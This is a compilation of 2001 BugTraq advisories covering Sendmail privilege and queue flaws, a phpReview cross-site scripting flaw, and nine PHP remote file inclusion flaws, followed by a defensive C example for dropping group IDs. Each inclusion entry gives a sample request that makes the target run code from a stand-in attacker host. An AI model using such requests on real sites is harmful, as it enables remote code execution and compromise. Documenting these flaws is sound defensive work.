Sendmail Inadequate Privilege Lowering Vulnerability
BugTraq ID: 3377
Remote: No
Date Published: 2001-10-01 00:00:00
Relevant URL: http://www.securityfocus.com/bid/3377
Summary:
Sendmail is a widely used MTA often shipped with Unix systems. Prior to version 8.12.0, the 'sendmail' executable was installed setuid root. To minimize the consequences of locally exploitable vulnerabilities in 'sendmail' (i.e., users gaining root access), Sendmail was reworked in version 8.12.0 to run with the privileges of a special non-root mail group.

One area of Sendmail that was not properly adjusted for the new privilege level was the configuration file processing component. With Sendmail, users can specify custom configuration files at the command line. During the processing of this user-supplied data, Sendmail drops privileges completely as a security precaution. Processing glitches such as signed integer errors and other bugs in this component of sendmail are not normally security vulnerabilities (as privileges are supposed to have been completely lowered when it runs).

In version 8.12.0, the 'sendmail' utility is setgid instead of setuid. To lower privileges, the 'setgid()' system call is used. This system call does not set the saved group ID. It is therefore possible to reclaim the effective group ID if an attacker can force the process to call 'setregid()'. This may be possible by exploiting some of the parsing bugs present in the configuration file processor.

If an attacker elevates privileges, the mail subsystem may be compromised. The attacker can then modify user mail files and the queue. There exist possibilities for further privilege elevation once an attacker has gained control over sendmail and the queue files.

[ so, sendmail finally has a multi-group structure ]

Sendmail Queue Processing Data Loss/DoS Vulnerability
BugTraq ID: 3378
Remote: No
Date Published: 2001-10-01 00:00:00
Relevant URL: http://www.securityfocus.com/bid/3378
Summary:
Sendmail is a freely available, widely deployed Mail Transport Agent (MTA). It is maintained by the Sendmail Consortium.
A problem in the software has been discovered that could allow an attacker to deny services to legitimate users of a sendmail system. The problem is due to a programming error in the software. Sendmail allows regular users to force processing of the entire mail queue. When running 'sendmail', users can change key configuration variables such as setting the message hop count to a value greater than the limit imposed by sendmail. In doing so, mail in the queue will be dropped when it is processed. If exploited, an attacker can cause a data loss/denial of service.

Hans Wolters phpReview Cross-Site Scripting Vulnerability
BugTraq ID: 3380
Remote: Yes
Date Published: 2001-10-01 00:00:00
Relevant URL: http://www.securityfocus.com/bid/3380
Summary:
phpReview is a freely available, open-source customizable web "reviewing" application. It allows users to enter and maintain reviews of such things as books, films, etc. phpReview does not filter HTML tags from user-submitted reviews. As a result, it is possible for a malicious user to include malicious script code in reviews. Successfully exploited, the script code will be executed in the browser of a web user who views the maliciously crafted review and will appear to originate from the website running the software. This issue opens up web users to cross-site scripting attacks and may potentially be leveraged to do such things as steal cookie-based authentication credentials.

Marc Logemann More.groupware Remote Arbitrary Code Execution Vulnerability
BugTraq ID: 3383
Remote: Yes
Date Published: 2001-10-02 00:00:00
Relevant URL: http://www.securityfocus.com/bid/3383
Summary:
More.groupware is freely available, open-source web-based groupware. It allows users to collaborate online through a web interface. A problem exists in More.groupware that will allow a remote attacker to execute arbitrary code on a host running the software (with the privileges of the webserver process). It is possible to supply arbitrary data to the $include variable.
This variable is used to specify a file containing PHP code that is to be executed. In PHP, values for script variables may be supplied from a web browser if they are not explicitly defined or initialized by the script. As a result, the affected script may be redirected to execute arbitrary code located on an external host, as specified by the attacker. This issue can be exploited if the remote attacker submits a maliciously crafted URL. This is an example of a malicious web request which will cause the script to execute arbitrary code supplied by the attacker:

    http://target.tld/vulnerable.php?includedir=http://malserver.tld/malcode

Actionpoll Remote Arbitrary Code Execution Vulnerability
BugTraq ID: 3384
Remote: Yes
Date Published: 2001-10-02 00:00:00
Relevant URL: http://www.securityfocus.com/bid/3384
Summary:
Actionpoll is a freely available, open-source PHP voting script. It allows surveys to be stored in a MySQL database or in text files. A problem exists in Actionpoll that will allow a remote attacker to execute arbitrary code on a host running the software (with the privileges of the webserver process). It is possible to supply arbitrary data to the $include variable. This variable is used to specify a file containing PHP code that is to be executed. In PHP, values for script variables may be supplied from a web browser if they are not explicitly defined or initialized by the script. As a result, the affected script may be redirected to execute arbitrary code located on an external host, as specified by the attacker. This issue can be exploited if the remote attacker submits a maliciously crafted URL.
This is an example of a malicious web request which will cause the script to execute arbitrary code supplied by the attacker:

    http://target.tld/vulnerable.php?includedir=http://malserver.tld/malcode

AWOL Remote Arbitrary Code Execution Vulnerability
BugTraq ID: 3387
Remote: Yes
Date Published: 2001-10-02 00:00:00
Relevant URL: http://www.securityfocus.com/bid/3387
Summary:
AWOL is a free, open-source PHP script which provides a web interface to simulate an In/Out board. A problem exists in AWOL that will allow a remote attacker to execute arbitrary code on a host running the software (with the privileges of the webserver process). It is possible to supply arbitrary data to the $include variable. This variable is used to specify a file containing PHP code that is to be executed. In PHP, values for script variables may be supplied from a web browser if they are not explicitly defined or initialized by the script. As a result, the affected script may be redirected to execute arbitrary code located on an external host, as specified by the attacker. This issue can be exploited if the remote attacker submits a maliciously crafted URL. This is an example of a malicious web request which will cause the script to execute arbitrary code supplied by the attacker:

    http://target.tld/vulnerable.php?includedir=http://malserver.tld/malcode

Paul M. Jones Phorecast Remote Arbitrary Code Execution Vulnerability
BugTraq ID: 3388
Remote: Yes
Date Published: 2001-10-02 00:00:00
Relevant URL: http://www.securityfocus.com/bid/3388
Summary:
Phorecast is freely available, open-source web-based single-user email. It allows users to send and receive email through a web-based interface. A problem exists in Phorecast that will allow a remote attacker to execute arbitrary code on a host running the software (with the privileges of the webserver process). It is possible to supply arbitrary data to the $include variable.
This variable is used to specify a file containing PHP code that is to be executed. In PHP, values for script variables may be supplied from a web browser if they are not explicitly defined or initialized by the script. As a result, the affected script may be redirected to execute arbitrary code located on an external host, as specified by the attacker. This issue can be exploited if the remote attacker submits a maliciously crafted URL. This is an example of a malicious web request which will cause the script to execute arbitrary code supplied by the attacker:

    http://target.tld/vulnerable.php?includedir=http://malserver.tld/malcode

CCC Remote Arbitrary Code Execution Vulnerability
BugTraq ID: 3389
Remote: Yes
Date Published: 2001-10-02 00:00:00
Relevant URL: http://www.securityfocus.com/bid/3389
Summary:
CCC is a free, open-source web-based inventory tracking system written in PHP. It also offers contact management, job tracking, job billing, etc. A problem exists in CCC that will allow a remote attacker to execute arbitrary code on a host running the software (with the privileges of the webserver process). It is possible to supply arbitrary data to the $include variable. This variable is used to specify a file containing PHP code that is to be executed. In PHP, values for script variables may be supplied from a web browser if they are not explicitly defined or initialized by the script. As a result, the affected script may be redirected to execute arbitrary code located on an external host, as specified by the attacker. This issue can be exploited if the remote attacker submits a maliciously crafted URL.
This is an example of a malicious web request which will cause the script to execute arbitrary code supplied by the attacker:

    http://target.tld/vulnerable.php?includedir=http://malserver.tld/malcode

Dark Hart Portal Remote Arbitrary Code Execution Vulnerability
BugTraq ID: 3390
Remote: Yes
Date Published: 2001-10-02 00:00:00
Relevant URL: http://www.securityfocus.com/bid/3390
Summary:
Dark Hart Portal is a free, open-source web portal that is written in PHP. A problem exists in Dark Hart Portal that will allow a remote attacker to execute arbitrary code on a host running the software (with the privileges of the webserver process). It is possible to supply arbitrary data to the $include variable. This variable is used to specify a file containing PHP code that is to be executed. In PHP, values for script variables may be supplied from a web browser if they are not explicitly defined or initialized by the script. As a result, the affected script may be redirected to execute arbitrary code located on an external host, as specified by the attacker. This issue can be exploited if the remote attacker submits a maliciously crafted URL. This is an example of a malicious web request which will cause the script to execute arbitrary code supplied by the attacker:

    http://target.tld/vulnerable.php?includedir=http://malserver.tld/malcode

Peaceworks Computer Consulting Phormation Remote Arbitrary Code Execution Vulnerability
BugTraq ID: 3393
Remote: Yes
Date Published: 2001-10-02 00:00:00
Relevant URL: http://www.securityfocus.com/bid/3393
Summary:
Phormation is a freely available, open-source set of PHP functions. It allows users to create any type of HTML form with a database backend. A problem exists in Phormation that will allow a remote attacker to execute arbitrary code on a host running the software (with the privileges of the webserver process). It is possible to supply arbitrary data to the $include variable.
This variable is used to specify a file containing PHP code that is to be executed. In PHP, values for script variables may be supplied from a web browser if they are not explicitly defined or initialized by the script. As a result, the affected script may be redirected to execute arbitrary code located on an external host, as specified by the attacker. This issue can be exploited if the remote attacker submits a maliciously crafted URL. This is an example of a malicious web request which will cause the script to execute arbitrary code supplied by the attacker:

    http://target.tld/vulnerable.php?includedir=http://malserver.tld/malcode

Derek Leung pSlash Remote Arbitrary Code Execution Vulnerability
BugTraq ID: 3395
Remote: Yes
Date Published: 2001-10-02 00:00:00
Relevant URL: http://www.securityfocus.com/bid/3395
Summary:
pSlash is freely available, open-source web portal software. It allows users to create their own websites based on a template. A problem exists in pSlash that will allow a remote attacker to execute arbitrary code on a host running the software (with the privileges of the webserver process). It is possible to supply arbitrary data to the $include variable. This variable is used to specify a file containing PHP code that is to be executed. In PHP, values for script variables may be supplied from a web browser if they are not explicitly defined or initialized by the script. As a result, the affected script may be redirected to execute arbitrary code located on an external host, as specified by the attacker. This issue can be exploited if the remote attacker submits a maliciously crafted URL.
This is an example of a malicious web request which will cause the script to execute arbitrary code supplied by the attacker:

    http://target.tld/vulnerable.php?includedir=http://malserver.tld/malcode

Bharat Mediratta Gallery Remote Arbitrary Code Execution Vulnerability
BugTraq ID: 3397
Remote: Yes
Date Published: 2001-10-02 00:00:00
Relevant URL: http://www.securityfocus.com/bid/3397
Summary:
Gallery is freely available, open-source web-based gallery software. It allows users to create their own web galleries based on a template. A problem exists in Gallery that will allow a remote attacker to execute arbitrary code on a host running the software (with the privileges of the webserver process). It is possible to supply arbitrary data to the $include variable. This variable is used to specify a file containing PHP code that is to be executed. In PHP, values for script variables may be supplied from a web browser if they are not explicitly defined or initialized by the script. As a result, the affected script may be redirected to execute arbitrary code located on an external host, as specified by the attacker. This issue can be exploited if the remote attacker submits a maliciously crafted URL. This is an example of a malicious web request which will cause the script to execute arbitrary code supplied by the attacker:

    http://target.tld/vulnerable.php?includedir=http://malserver.tld/malcode
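
For the Sendmail entry above (BugTraq ID 3377): an added C example, not Sendmail's own code, that contrasts the setgid()-only drop the entry describes with a permanent drop that also resets the saved group ID and verifies the result. It assumes a Linux/glibc-style system that provides setresgid() and getresgid(); the function names are illustrative.

```c
#ifndef _GNU_SOURCE
#define _GNU_SOURCE              /* exposes setresgid()/getresgid() in glibc */
#endif
#include <stdio.h>
#include <sys/types.h>
#include <unistd.h>

/* Prototypes repeated so the file builds even if _GNU_SOURCE came too late. */
int setresgid(gid_t rgid, gid_t egid, gid_t sgid);
int getresgid(gid_t *rgid, gid_t *egid, gid_t *sgid);

/* 1 if 'gid' is still the real, effective or saved group ID, i.e. the
 * process could switch back to it with setregid()/setegid(). Fails closed. */
int gid_still_held(gid_t gid)
{
    gid_t r, e, s;
    if (getresgid(&r, &e, &s) != 0)
        return 1;
    return r == gid || e == gid || s == gid;
}

/* Weak drop, as the entry describes: in a setgid, non-root process setgid()
 * changes only the effective gid; the saved gid keeps the privileged group. */
int drop_gid_weak(void)
{
    return setgid(getgid());
}

/* Permanent drop: set real, effective and saved gid together, then verify.
 * Returns 0 on success, -1 if any of the three IDs is not the caller's gid. */
int drop_gid_permanently(void)
{
    gid_t target = getgid(), r, e, s;
    if (setresgid(target, target, target) != 0)
        return -1;
    if (getresgid(&r, &e, &s) != 0)
        return -1;
    return (r == target && e == target && s == target) ? 0 : -1;
}

int main(void)
{
    gid_t priv = getegid();      /* differs from getgid() only when setgid */
    if (drop_gid_permanently() != 0)
        return 1;
    printf("gid %ld still held: %d\n", (long)priv, gid_still_held(priv));
    return 0;
}
```

Run from a binary installed setgid to a non-root group, the final line reports 0 after the permanent drop; after drop_gid_weak() the same check would report 1 because the saved group ID is unchanged.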
